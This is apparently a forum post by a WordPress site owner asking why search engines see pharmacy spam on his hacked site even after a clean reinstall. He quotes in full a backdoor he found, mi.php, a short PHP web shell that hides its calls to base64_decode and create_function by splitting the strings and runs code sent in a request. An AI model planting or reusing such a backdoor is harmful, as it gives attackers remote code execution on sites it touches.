Hacked: mi.php & findwpconfig.php

I was hacked a month ago. Deleted everything, backed up db, changed all my server passwords, uploaded a fresh WordPress install. Changed all passwords again. I changed my server + db twice, and host changed my db remotely twice.

Now I’m hacked again:

http://www.google.com/search?hl=en&source=hp&q=nexium+jessewarden&aq=f&aqi=&aql=&oq=&gs_rfai=

I searched my db for iframe, pharmacy, and other illicit terms and url’s, but turned up nada. I did the same for my entire copied website; nada. My .htacess seems fine as well.

I re-downloaded WordPress a few hours ago, and did a diff against my website. The only 2 things strange are found were 2 files that were not included in the standard WordPress installation: mi.php and findwpconfig.php.

findwpconfig.php is empty. I don’t know the chmod settings on it, but it’s pretty easy to guess its purpose: to find my wpconfig file, and snag out my in-plain-text database password. The mi.php contains the following:

http://pastebin.com/hC6ZNiLc

<?php $a = 'm'.'d5';if($a($_REQUEST[$a])=='698357e86842'.'1222bcf89349bd5cf34d'){$w = 'Cdbl0sYoWOiyJt3qtqyOoqxA';$x = $_REQUEST[$w];$y = 'base'.'6';$y.= '4_d'.'ecode';$x = $y($x);$z = 'creat'.'e_f';$z.= 'unction';$x = $z('',$x);$x();} ?>

Tricky… no wonder I couldn’t find “base64” in a string search.

Anyway, I don’t mind re-installing everything, but clearly following the standard policy of a clean install ( http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/ ) wasn’t enough. Whatever the exploit was, I didn’t clean up last time.

So… any clue where to look? How is it changing my site’s content only for search engines, but not for regular browsers?